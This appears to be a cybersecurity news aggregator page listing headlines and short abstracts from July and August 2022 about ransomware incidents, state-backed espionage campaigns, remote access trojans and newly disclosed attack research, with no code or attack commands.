South Staffordshire Water, a company supplying 330 million liters of drinking water to 1.6 consumers daily, has issued a statement confirming IT disruption from a cyberattack.BleepingComputer
August 15, 2022
Russian State Hackers Continue to Attack Ukrainian Entities with Infostealer Malware Full Text
Abstract
Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what's suspected to be an espionage operation. Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked Shuckworm , also known as Actinium , Armageddon , Gamaredon, Primitive Bear, and Trident Ursa. The findings have been corroborated by the Computer Emergency Response Team of Ukraine (CERT-UA). The threat actor, active since at least 2013, is known for explicitly singling out public and private entities in Ukraine. The attacks have since ratcheted up in the wake of Russia's military invasion in late 2022. The latest set of attacks are said to have commenced on July 15, 2022, and ongoing as recently as August 8, with the infection chains leveraging phishing emails disguised as newsletters and combat orders, ultimately leading to the deployment of a PowerShell stealer malware dubbed GammaLoad.PS1_v2 .The Hacker News
August 15, 2022
Argentina’s Judiciary of Córdoba hit by PLAY ransomware attack Full Text
Abstract
Argentina's Judiciary of Córdoba has shut down its IT systems after suffering a ransomware attack, reportedly at the hands of the new 'Play' ransomware operation.BleepingComputer
August 15, 2022
Russian hackers target Ukraine with default Word template hijacker Full Text
Abstract
Threat analysts monitoring cyberattacks on Ukraine report that the operations of the notorious Russian state-backed hacking group 'Gamaredon' continue to heavily target the war-torn country.BleepingComputer
August 13, 2022
Cedar Rapids schools pay ransom in cyber attack Full Text
Abstract
The Cedar Rapids school district paid a ransom in hopes of keeping personal data compromised in a cyberattack last month from being released, the school superintendent has told parents.The Gazette
August 11, 2022
Cisco Confirms It’s Been Hacked by Yanluowang Ransomware Gang Full Text
Abstract
Networking equipment major Cisco on Wednesday confirmed it was the victim of a cyberattack on May 24, 2022 after the attackers got hold of an employee's personal Google account that contained passwords synced from their web browser. "Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee's personal Google account," Cisco Talos said in a detailed write-up. "The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account." The disclosure comes as cybercriminal actors associated with the Yanluowang ransomware gang published a list of files from the breach to their data leak site on August 10. The exfiltrated information, according to Talos, included the contents of a Box cloud storage folder that was associated with the compromised employee's account and is not believed to have included any valuablThe Hacker News
August 11, 2022
Hackers Behind Cuba Ransomware Attacks Using New RAT Malware Full Text
Abstract
Threat actors associated with the Cuba ransomware have been linked to previously undocumented tactics, techniques and procedures (TTPs), including a new remote access trojan called ROMCOM RAT on compromised systems. The new findings come from Palo Alto Networks' Unit 42 threat intelligence team, which is tracking the double extortion ransomware group under the constellation-themed moniker Tropical Scorpius . Cuba ransomware (aka COLDDRAW ), which was first detected in December 2019, reemerged on the threat landscape in November 2021 and has been attributed to attacks against 60 entities in five critical infrastructure sectors, amassing at least $43.9 million in ransom payments. Of the 60 victims listed on its data leak site, 40 are located in the U.S., indicating a not as global distribution of targeted organizations as other ransomware gangs. "Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as RemoteThe Hacker News
August 11, 2022
UK NHS service recovery may take a month after MSP ransomware attack Full Text
Abstract
Managed service provider (MSP) Advanced confirmed that a ransomware attack on its systems caused the disruption of emergency services (111) from the United Kingdom's National Health Service (NHS).BleepingComputer
August 10, 2022
Cisco was hacked by the Yanluowang ransomware gang Full Text
Abstract
Cisco discloses a security breach, the Yanluowang ransomware group breached its corporate network in late May and stole internal data. Cisco disclosed a security breach, the Yanluowang ransomware group breached its corporate network in late May and stole...Security Affairs
August 10, 2022
Experts Uncover Details on Maui Ransomware Attack by North Korean Hackers Full Text
Abstract
The first ever incident possibly involving the ransomware family known as Maui occurred on April 15, 2021, aimed at an unnamed Japanese housing company. The disclosure from Kaspersky arrives a month after U.S. cybersecurity and intelligence agencies issued an advisory about the use of the ransomware strain by North Korean government-backed hackers to target the healthcare sector since at least May 2021. Much of the data about its modus operandi came from incident response activities and industry analysis of a Maui sample that revealed a lack of "several key features" typically associated with ransomware-as-a-service (RaaS) operations. Not only is Maui designed to be manually executed by a remote actor via a command-line interface, it's also notable for not including a ransom note to provide recovery instructions. Subsequently, the Justice Department announced the seizure of $500,000 worth of Bitcoin that were extorted from several organizations, including two heThe Hacker News
August 10, 2022
Hacker uses new RAT malware in Cuba Ransomware attacks Full Text
Abstract
A member of the Cuba ransomware operation is employing previously unseen tactics, techniques, and procedures (TTPs), including a novel RAT (remote access trojan) and a new local privilege escalation tool.BleepingComputer
August 9, 2022
Chinese actors behind attacks on industrial enterprises and public institutions Full Text
Abstract
China-linked threat actors targeted dozens of industrial enterprises and public institutions in Afghanistan and Europe. In January 2022, researchers at Kaspersky ICS CERT uncovered a series of targeted attacks on military industrial enterprises and public...Security Affairs
August 08, 2022
Meta Cracks Down on Cyber Espionage Operations in South Asia Abusing Facebook Full Text
Abstract
Facebook parent company Meta disclosed that it took action against two espionage operations in South Asia that leveraged its social media platforms to distribute malware to potential targets. The first set of activities is what the company described as "persistent and well-resourced" and undertaken by a hacking group tracked under the moniker Bitter APT (aka APT-C-08 or T-APT-17) targeting individuals in New Zealand, India, Pakistan, and the U.K. "Bitter used various malicious tactics to target people online with social engineering and infect their devices with malware," Meta said in its Quarterly Adversarial Threat Report. "They used a mix of link-shortening services, malicious domains, compromised websites, and third-party hosting providers to distribute their malware." The attacks involved the threat actor creating fictitious personas on the platform, masquerading as attractive young women in a bid to build trust with targets and lure them into clThe Hacker News
August 7, 2022
Serious cyberattack hits German Chambers of Industry and Commerce (DIHK) Full Text
Abstract
A massive cyberattack hit the website of the German Chambers of Industry and Commerce (DIHK) this week. A massive attack hit the website of the German Chambers of Industry and Commerce (DIHK) forcing the organization to shut down its IT systems as a precautionary...Security Affairs
August 05, 2022
Iranian Hackers likely Behind Disruptive Cyberattacks Against Albanian Government Full Text
Abstract
A threat actor working to further Iranian goals is said to have been behind a set of disruptive cyberattacks against Albanian government services in mid-July 2022. Cybersecurity firm Mandiant said the malicious activity against a NATO state represented a "geographic expansion of Iranian disruptive cyber operations." The July 17 attacks , according to Albania's National Agency of Information Society, forced the government to "temporarily close access to online public services and other government websites" because of a "synchronized and sophisticated cybercriminal attack from outside Albania." The politically motivated disruptive operation, per Mandiant, entailed the deployment of a new ransomware family called ROADSWEEP that included a ransom note with the text: "Why should our taxes be spent on the benefit of DURRES terrorists?" A front named HomeLand Justice has since claimed credit for the cyber offensive, with the group also alleThe Hacker News
August 05, 2022
Hackers are actively exploiting password-stealing flaw in Zimbra Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has added the Zimbra CVE-2022-27824 flaw to its 'Known Exploited Vulnerabilities Catalog,' indicating that it is actively exploited in attacks by hackers.BleepingComputer
August 5, 2022
Disruptive Roadsweep Ransomware Attacks on NATO Member Albania Linked to Iran Full Text
Abstract
The Albanian government announced in mid-July that it was forced to shut down some public online services due to a cyberattack. Mandiant has investigated the incident, which led to the discovery of a new piece of ransomware.Security Week
August 05, 2022
A Growing Number of Malware Attacks Leveraging Dark Utilities ‘C2-as-a-Service’ Full Text
Abstract
A nascent service called Dark Utilities has already attracted 3,000 users for its ability to provide command-and-control (C2) services with the goal of commandeering compromised systems. "It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems," Cisco Talos said in a report shared with The Hacker News. Dark Utilities, which emerged in early 2022, is advertised as a "C2-as-a-Service" (C2aaS), offering access to infrastructure hosted on the clearnet as well as the TOR network and associated payloads with support for Windows, Linux, and Python-based implementations for a mere €9.99. Authenticated users on the platform are presented with a dashboard that makes it possible to generate new payloads tailored to a specific operating system that can then be deployed and executed on victim hosts. Additionally, users are provided an administrative panelThe Hacker News
August 4, 2022
New Woody RAT used in attacks aimed at Russian entities Full Text
Abstract
An unknown threat actor is targeting Russian organizations with a new remote access trojan called Woody RAT. Malwarebytes researchers observed an unknown threat actor targeting Russian organizations with a new remote access trojan called Woody RAT....Security Affairs
August 04, 2022
New Woody RAT Malware Being Used to Target Russian Organizations Full Text
Abstract
An unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called Woody RAT for at least a year as part of a spear-phishing campaign. The advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched "Follina" support diagnostic tool vulnerability ( CVE-2022-30190 ) in Windows. Like other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enables the threat actor to remotely commandeer and steal sensitive information from the infected systems. "The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group," Malwarebytes researchers Ankur Saini and Hossein Jazi said in a Wednesday report. "When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload.&quoThe Hacker News
August 04, 2022
Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage Full Text
Abstract
A threat actor is said to have "highly likely" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector. The attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as TAC-040 . "The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory," the company said . "After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment." The Atlassian vulnerability suspected to have been exploited is CVE-2022-26134 , an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.The Hacker News
August 04, 2022
German Chambers of Industry and Commerce hit by ‘massive’ cyberattack Full Text
Abstract
The Association of German Chambers of Industry and Commerce (DIHK) was forced to shut down all of its IT systems and switch off digital services, telephones, and email servers, in response to a cyberattack.BleepingComputer
August 03, 2022
Russian organizations attacked with new Woody RAT malware Full Text
Abstract
Unknown attackers target Russian entities with newly discovered malware that allows them to control and steal information from compromised devices remotely.BleepingComputer
August 3, 2022
Power semiconductor component manufacturer Semikron suffered a ransomware attack Full Text
Abstract
Semikron, a German-based independent manufacturer of power semiconductor components, suffered a ransomware cyberattck. Semikron is a German-based independent manufacturer of power semiconductor components, it employs more than...Security Affairs
August 03, 2022
Spanish research agency still recovering after ransomware attack Full Text
Abstract
The Spanish National Research Council (CSIC) last month was hit by a ransomware attack that is now attributed to Russian hackers.BleepingComputer
August 03, 2022
Researchers Warns of Large-Scale AiTM Attacks Targeting Enterprise Users Full Text
Abstract
A new, large-scale phishing campaign has been observed using adversary-in-the-middle (AitM) techniques to get around security protections and compromise enterprise email accounts. "It uses an adversary-in-the-middle (AitM) attack technique capable of bypassing multi-factor authentication," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu said in a Tuesday report. "The campaign is specifically designed to reach end users in enterprises that use Microsoft's email services." Prominent targets include fintech, lending, insurance, energy, manufacturing, and federal credit union verticals located in the U.S., U.K., New Zealand, and Australia. This is not the first time such a phishing attack has come to light. Last month, Microsoft disclosed that over 10,000 organizations had been targeted since September 2021 by means of AitM techniques to breach accounts secured with multi-factor authentication (MFA). The ongoing campaign, effective June 2022,The Hacker News
August 02, 2022
Semiconductor manufacturer Semikron hit by LV ransomware attack Full Text
Abstract
German power electronics manufacturer Semikron has disclosed that it was hit by a ransomware attack that partially encrypted the company's network.BleepingComputer
August 2, 2022
GoLang-based ‘Manjusaka’ Attack Framework Imitates Sliver and Cobalt Strike Full Text
Abstract
Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild that has the potential to become prevalent across the threat landscape. This framework is advertised as an imitation of Cobalt Strike.Cisco Talos
August 02, 2022
EU missile maker MBDA confirms data theft extortion, denies breach Full Text
Abstract
MBDA, one of the largest missile developers and manufacturers in Europe, has responded to rumors about a cyberattack on its infrastructure saying that claims of a breach of its systems are false.BleepingComputer
August 01, 2022
BlackCat ransomware claims attack on European gas pipeline Full Text
Abstract
The ransomware group known as ALPHV (aka BlackCat) has assumed over the weekend responsibility for the cyberattack that hit Creos Luxembourg last week, a natural gas pipeline and electricity network operator in the central European country.BleepingComputer
July 29, 2022
Microsoft links Raspberry Robin malware to Evil Corp attacks Full Text
Abstract
Microsoft has discovered that an access broker it tracks as DEV-0206 uses the Raspberry Robin Windows worm to deploy a malware downloader on networks where it also found evidence of malicious activity matching Evil Corp tactics.BleepingComputer
July 28, 2022
Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits Full Text
Abstract
A cyber mercenary that "ostensibly sells general security and information analysis services to commercial customers" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities. The company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called DSIRF that's linked to the development and attempted sale of a piece of cyberweapon referred to as Subzero , which can be used to hack targets' phones, computers, and internet-connected devices. "Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama," the tech giant's cybersecurity teams said in a Wednesday report. Microsoft is tracking the actor under the moniker KNOTWEED, continuing its trend of naming PSOAs using names given to trees and shrubs. The company previously designated the name SOURGThe Hacker News
July 28, 2022
European firm DSIRF behind the attacks with Subzero surveillance malware Full Text
Abstract
Microsoft linked a private-sector offensive actor (PSOA) to attacks using multiple zero-day exploits for its Subzero malware. The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) researchers linked a threat...Security Affairs
July 28, 2022
As Microsoft blocks Office macros, hackers find new attack vectors Full Text
Abstract
Hackers who normally distributed malware via phishing attachments with malicious macros gradually changed tactics after Microsoft Office began blocking them by default, switching to new file types such as ISO, RAR, and Windows Shortcut (LNK) attachments.BleepingComputer
July 27, 2022
Attackers increasingly abusing IIS extensions to establish covert backdoors Full Text
Abstract
Threat actors are increasingly abusing Internet Information Services (IIS) extensions to maintain persistence on target servers. Microsoft warns of threat actors that are increasingly abusing Internet Information Services (IIS) extensions to establish...Security Affairs
July 26, 2022
Microsoft Exchange servers increasingly hacked with IIS backdoors Full Text
Abstract
Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells.BleepingComputer
July 26, 2022
Zero Day attacks target online stores using PrestaShop Full Text
Abstract
Thera actors are exploiting a zero-day vulnerability to steal payment information from sites using the open source e-commerce platform PrestaShop. Threat actors are targeting websites using open source e-commerce platform...Security Affairs
July 26, 2022
LockBit claims ransomware attack on Italian tax agency Full Text
Abstract
Italian authorities are investigating claims made by the LockBit ransomware gang that they breached the network of the Italian Internal Revenue Service (L'Agenzia delle Entrate).BleepingComputer
July 24, 2022
Roaming Mantis Financial Hackers Targeting Android and iPhone Users in France Full Text
Abstract
The mobile threat campaign tracked as Roaming Mantis has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries. No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week. Attack chains involving Roaming Mantis , a financially motivated Chinese threat actor, are known to either deploy a piece of banking trojan named MoqHao (aka XLoader) or redirect iPhone users to credential harvesting landing pages that mimic the iCloud login page. "MoqHao (aka Wroba, XLoader for Android) is an Android remote access trojan (RAT) with information-stealing and backdoor capabilities that likely spreads via SMS," Sekoia researchers said . It all starts with a phishing SMS, a technique known as smishing, enticing users with package delivery-themed messages containing rogue links, that, when clicThe Hacker News
July 23, 2022
North Korean hackers attack EU targets with Konni RAT malware Full Text
Abstract
Threat analysts have uncovered a new campaign attributed to APT37, a North Korean group of hackers, targeting high-value organizations in the Czech Republic, Poland, and other European countries.BleepingComputer
July 22, 2022
Ukrainian Radio Stations Hacked to Broadcast Fake News About Zelenskyy’s Health Full Text
Abstract
Ukrainian radio operator TAVR Media on Thursday became the latest victim of a cyberattack, resulting in the broadcast of a fake message that President Volodymyr Zelenskyy was seriously ill. "Cybercriminals spread information that the President of Ukraine, Volodymyr Zelenskyy, is allegedly in intensive care, and his duties are performed by the Chairman of the Verkhovna Rada, Ruslan Stefanchuk," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in an update. The Kyiv-based holding company oversees nine major radio stations, including Hit FM, Radio ROKS, KISS FM, Radio RELAX, Melody FM, Nashe Radio, Radio JAZZ, Classic Radio, and Radio Bayraktar. In a separate post on Facebook, TAVR Media disclosed its servers and networks were targeted in a cyberattack and it's working to resolve the issue. The company also emphasized that "no information about the health problems of the President of Ukraine Volodymyr Zelenskyy isThe Hacker News
July 21, 2022
Hackers Target Ukrainian Software Company Using GoMet Backdoor Full Text
Abstract
A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found. The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network. "This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise," Cisco Talos said in a report shared with The Hacker News. Although there are no concrete indicators linking the attack to a single actor or group, the cybersecurity firm's assessment points to Russian nation-state activity. Public reporting into the use of GoMet in real-world attacks has so far uncovered only two documented cases to date: one in 2020, coinciding with the disclosure of CVE-2020-5902 , a critical remotThe Hacker News
July 21, 2022
Threat actors target software firm in Ukraine using GoMet backdoor Full Text
Abstract
Threat actors targeted a large software development company in Ukraine using the GoMet backdoor. Researchers from Cisco Talos discovered an uncommon piece of malware that was employed in an attack against a large Ukrainian software development company. The...Security Affairs
July 21, 2022
Cyberattackers Target Ukrainian Organizations Using GoMet Backdoor Full Text
Abstract
The original GoMet author posted the code on GitHub on March 31, 2019, and had commits until April 2, 2019. The backdoor itself is a rather simple piece of software written in the Go programming language.Cisco Talos
July 20, 2022
Elastix VoIP Systems Hacked to Serve Web shells Full Text
Abstract
A large-scale campaign was found targeting Elastix VoIP telephony servers with over 500,000 malware samples, over a period of three months. The campaign’s goal was to plant a PHP web shell to run arbitrary commands on infected communications servers. The operation systematically exploited SIP serve ... Read MoreCyware Alerts - Hacker News
July 19, 2022
Building materials giant Knauf hit by Black Basta ransomware gang Full Text
Abstract
The Knauf Group has announced it has been the target of a cyberattack that has disrupted its business operations, forcing its global IT team to shut down all IT systems to isolate the incident.BleepingComputer
July 19, 2022
New Air-Gap Attack Uses SATA Cable as an Antenna to Transfer Radio Signals Full Text
Abstract
A new method devised to leak information and jump over air-gaps takes advantage of Serial Advanced Technology Attachment ( SATA ) or Serial ATA cables as a communication medium, adding to a long list of electromagnetic, magnetic, electric, optical, and acoustic methods already demonstrated to plunder data. "Although air-gap computers have no wireless connectivity, we show that attackers can use the SATA cable as a wireless antenna to transfer radio signals at the 6GHz frequency band," Dr. Mordechai Guri, the head of R&D in the Cyber Security Research Center in the Ben Gurion University of the Negev in Israel, wrote in a paper published last week. The technique, dubbed SATAn , takes advantage of the prevalence of the computer bus interface, making it "highly available to attackers in a wide range of computer systems and IT environments." Put simply, the goal is to use the SATA cable as a covert channel to emanate electromagnetic signals and transfer a brThe Hacker News
July 19, 2022
EU warns of Russian cyberattack spillover, escalation risks Full Text
Abstract
The Council of the European Union (EU) said today that Russian hackers and hacker groups increasingly attacking "essential" organizations worldwide could lead to spillover risks and potential escalation.BleepingComputer
July 19, 2022
Belgium says Chinese hackers attacked its Ministry of Defense Full Text
Abstract
The Minister for Foreign Affairs of Belgium says multiple Chinese state-backed threat groups targeted the country's defense and interior ministries.BleepingComputer
July 19, 2022
Air-gapped systems leak data via SATA cable WiFi antennas Full Text
Abstract
An Israeli security researcher has demonstrated a novel attack against air-gapped systems by leveraging the SATA cables inside computers as a wireless antenna to emanate data via radio signals.BleepingComputer
July 18, 2022
Israel: Health Ministry Website Faces Cyberattack, Oversea Access Blocked Full Text
Abstract
Israel's Health Ministry website faced disrupted access to users abroad, reportedly due to a cyberattack, the ministry said Sunday. Pro-Iranian hackers based in Iraq, called Altahrea Team, claimed responsibility for the cyberattack.i24 News
July 18, 2022
Lithuanian ad website hit by cyberattack, warns of possible customer data leak Full Text
Abstract
The portal stressed it did not store particularly sensitive information, such as bank account and payment card details, personal ID codes, and home addresses in its database.Lrt
July 18, 2022
A massive cyberattack hit Albania Full Text
Abstract
A synchronized criminal attack from abroad hit Albania over the weekend, all Albanian government systems shut down following the cyberattack. Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday. A synchronized...Security Affairs
July 18, 2022
India: Capital markets regulator SEBI files FIR in cybersecurity incident as email accounts of 11 officials hacked Full Text
Abstract
The Securities and Exchange Board of India (Sebi) on Saturday said it has lodged a complaint against a cybersecurity incident it noticed on its e-mail system. However, the regulator added that no sensitive data was stolen.Live Mint
July 16, 2022
New Qakbot Attacks are Much Stealthier and Effective than Ever Full Text
Abstract
Zscaler exposed new detection evasion attempts by Qakbot malware actors. It is now using ZIP file extensions, catchy file names with common formats, and Excel 4.0 macros to fool victims into downloading attachments containing the malware. To stay protected from such threats, organizations are ... Read MoreCyware Alerts - Hacker News
July 16, 2022
Digium Phones Under Attack: Insight Into the Web Shell Implant Full Text
Abstract
Researchers at Unit 42 observed an operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software.Palo Alto Networks
July 16, 2022
Threat actors exploit a flaw in Digium Phone Software to target VoIP servers Full Text
Abstract
Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium's software to install a web shell, Palo Alto Networks warns. Recently, Unit 42 researchers spotted a campaign targeting the Elastix system used in Digium phones since...Security Affairs
July 15, 2022
Hackers Targeting VoIP Servers By Exploiting Digium Phone Software Full Text
Abstract
VoIP phones using Digium's software have been targeted to drop a web shell on their servers as part of an attack campaign designed to exfiltrate data by downloading and executing additional payloads. "The malware installs multilayer obfuscated PHP backdoors to the web server's file system, downloads new payloads for execution, and schedules recurring tasks to re-infect the host system," Palo Alto Networks Unit 42 said in a Friday report. The unusual activity is said to have commenced in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server. Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020, alluding to the possibility that they could be a "resurgence" of the previous attacks. Coinciding with the sudden surge is the public disclosThe Hacker News
July 15, 2022
New Cache Side Channel Attack Can De-Anonymize Targeted Online Users Full Text
Abstract
A group of academics from the New Jersey Institute of Technology (NJIT) has warned of a novel technique that could be used to defeat anonymity protections and identify a unique website visitor. "An attacker who has complete or partial control over a website can learn whether a specific target (i.e., a unique individual) is browsing the website," the researchers said . "The attacker knows this target only through a public identifier, such as an email address or a Twitter handle." The cache-based targeted de-anonymization attack is a cross-site leak that involves the adversary leveraging a service such as Google Drive, Dropbox, or YouTube to privately share a resource (e.g., image, video, or a YouTube playlist) with the target, followed by embedding the shared resource into the attack website. This can be achieved by, say, privately sharing the resource with the target using the victim's email address or the appropriate username associated with the servThe Hacker News
July 15, 2022
Attackers scan 1.6 million WordPress sites for vulnerable plugin Full Text
Abstract
Security researchers have detected a massive campaign that scanned close to 1.6 million WordPress sites for the presence of a vulnerable plugin that allows uploading files without authentication.BleepingComputer
July 15, 2022
North Korean Hackers Targeting Small and Midsize Businesses with H0lyGh0st Ransomware Full Text
Abstract
An emerging threat cluster originating from North Korea has been linked to developing and using ransomware in cyberattacks targeting small businesses since September 2021. The group, which calls itself H0lyGh0st after the ransomware payload of the same name, is being tracked by the Microsoft Threat Intelligence Center under the moniker DEV-0530, a designation assigned for unknown, emerging, or a developing group of threat activity. Targeted entities primarily include small-to-midsize businesses such as manufacturing organizations, banks, schools, and event and meeting planning companies. "Along with their H0lyGh0st payload, DEV-0530 maintains an .onion site that the group uses to interact with their victims," the researchers said in a Thursday analysis. "The group's standard methodology is to encrypt all files on the target device and use the file extension .h0lyenc, send the victim a sample of the files as proof, and then demand payment in Bitcoin in exchangeThe Hacker News
July 14, 2022
State-Backed Hackers Targeting Journalists in Widespread Espionage Campaigns Full Text
Abstract
Nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware as part of a series of campaigns since early 2021. "Most commonly, phishing attacks targeting journalists are used for espionage or to gain key insights into the inner workings of another government, company, or other area of state-designated import," Proofpoint said in a report shared with The Hacker News. The ultimate goal of the intrusions, the enterprise security firm said, is to gain a competitive intelligence edge or spread disinformation and propaganda. Proofpoint said it identified two Chinese hacking groups, TA412 (aka Zirconium or Judgment Panda) and TA459 , targeting media personnel with malicious emails containing web beacons and weaponized documents respectively that were used to amass information about the recipients' network environments and drop Chinoxy malware. In a similar vein, the North KoreThe Hacker News
July 14, 2022
New Retbleed speculative execution CPU attack bypasses Retpoline fixes Full Text
Abstract
Security researchers have discovered a new speculative execution attack called Retbleed that affects processors from both Intel and AMD and could be used to extract sensitive information.BleepingComputer
July 14, 2022
Pakistani Hackers Targeting Indian Students in Latest Malware Campaign Full Text
Abstract
The advanced persistent threat (APT) group known as Transparent Tribe has been attributed to a new ongoing phishing campaign targeting students at various educational institutions in India at least since December 2021. "This new campaign also suggests that the APT is actively expanding its network of victims to include civilian users," Cisco Talos said in a report shared with The Hacker News. Also tracked under the monikers APT36, Operation C-Major, PROJECTM, Mythic Leopard, the Transparent Tribe actor is suspected to be of Pakistani origin and is known to strike government entities and think tanks in India and Afghanistan with custom malware such as CrimsonRAT, ObliqueRAT, and CapraRAT. But the targeting of educational institutions and students, first observed by India-based K7 Labs in May 2022, indicates a deviation from the adversary's typical focus. "The latest targeting of the educational sector may align with the strategic goals of espionage of theThe Hacker News
July 13, 2022
Bandai Namco confirms hack after ALPHV ransomware data leak threat Full Text
Abstract
Game publishing giant Bandai Namco has confirmed that they suffered a cyberattack that may have resulted in the theft of customers' personal data.BleepingComputer
July 12, 2022
The President of European Central Bank Christine Lagarde targeted by hackers Full Text
Abstract
Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt. The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt. The European Central...Security Affairs
July 11, 2022
India: CPWD faces cyber attacks, reiterates guidelines to employees Full Text
Abstract
The Central Public Works Department has been facing a spate of targeted cyberattacks on computers across its offices, according to an advisory it issued to employees last week, reiterating earlier cybersecurity guidelines.The Hindu
July 11, 2022
Associated Eye Care Discloses Impact From 2020 Netgain Ransomware Attack Full Text
Abstract
In November 2020, Netgain, a provider of managed IT services to several industries, fell victim to a ransomware attack that impacted numerous organizations in the healthcare sector, all of which were informed of the incident by January 2021.Security Week
July 10, 2022
Maastricht University wound up earning money from its ransom payment Full Text
Abstract
Maastricht University (UM), a Dutch university with more than 22,000 students, said last week that it has recovered the ransom paid after a ransomware attack that hit its network in December 2019.BleepingComputer
July 10, 2022
French telephone operator La Poste Mobile suffered a ransomware attack Full Text
Abstract
French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services. The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed...Security Affairs
July 9, 2022
Ongoing Raspberry Robin campaign leverages compromised QNAP devices Full Text
Abstract
Cybereason researchers are warning of a wave of attacks spreading the wormable Windows malware Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The...Security Affairs
July 8, 2022
U.S. Healthcare Orgs Targeted with Maui Ransomware Full Text
Abstract
State-sponsored actors are deploying the unique malware–which targets specific files and leaves no ransomware note–in ongoing attacks.Threatpost
July 8, 2022
IconBurst Supply Chain Attacks Steal Data Via Malicious NPM Packages Full Text
Abstract
An NPM supply-chain attack campaign, dubbed IconBurst, has been seen leveraging several malicious NPM modules to infect hundreds of systems. Researchers have observed similarities between the domains used to exfiltrate information implying that the different modules used in this campaign are contro ... Read MoreCyware Alerts - Hacker News
July 07, 2022
TrickBot Gang Shifted its Focus on “Systematically” Targeting Ukraine Full Text
Abstract
In what's being described as an "unprecedented" twist, the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022. The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such as IcedID, CobaltStrike, AnchorMail, and Meterpreter . Tracked under the names ITG23, Gold Blackburn , and Wizard Spider, the financially motivated cybercrime gang is known for its development of the TrickBot banking trojan and was subsumed into the now-discontinued Conti ransomware cartel earlier this year. But merely weeks later, the actors associated with the group resurfaced with a revamped version of the AnchorDNS backdoor called AnchorMail that uses SMTPS and IMAP protocols for command-and-control communications. "ITG23's campaigns against Ukraine arThe Hacker News
July 07, 2022
North Korean Maui Ransomware Actively Targeting U.S. Healthcare Organizations Full Text
Abstract
In a new joint cybersecurity advisory, U.S. cybersecurity and intelligence agencies have warned about the use of Maui ransomware by North Korean government-backed hackers to target the healthcare sector since at least May 2021. "North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services," the authorities noted . The alert comes courtesy of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of the Treasury. Cybersecurity firm Stairwell, whose findings formed the basis of the advisory, said the lesser-known ransomware family stands out because of a lack of several key features commonly associated with ransomware-as-a-service (RaaS) groups. This includes the absence of "embedded ransom note to provide recovThe Hacker News
July 07, 2022
Quantum ransomware attack affects 657 healthcare orgs Full Text
Abstract
Professional Finance Company Inc. (PFC), a full-service accounts receivables management company, says that a ransomware attack in late February led to a data breach affecting over 600 healthcare organizations.BleepingComputer
July 07, 2022
QNAP warns of new Checkmate ransomware targeting NAS devices Full Text
Abstract
Taiwan-based network-attached storage (NAS) vendor QNAP warned customers to secure their devices against attacks using Checkmate ransomware to encrypt data.BleepingComputer
July 06, 2022
IT services giant SHI hit by “professional malware attack” Full Text
Abstract
SHI International Corp, a New Jersey-based provider of Information Technology (IT) products and services, has confirmed that its network was hit by a malware attack over the weekend.BleepingComputer
July 06, 2022
Hackers Abusing BRc4 Red Team Penetration Tool in Attacks to Evade Detection Full Text
Abstract
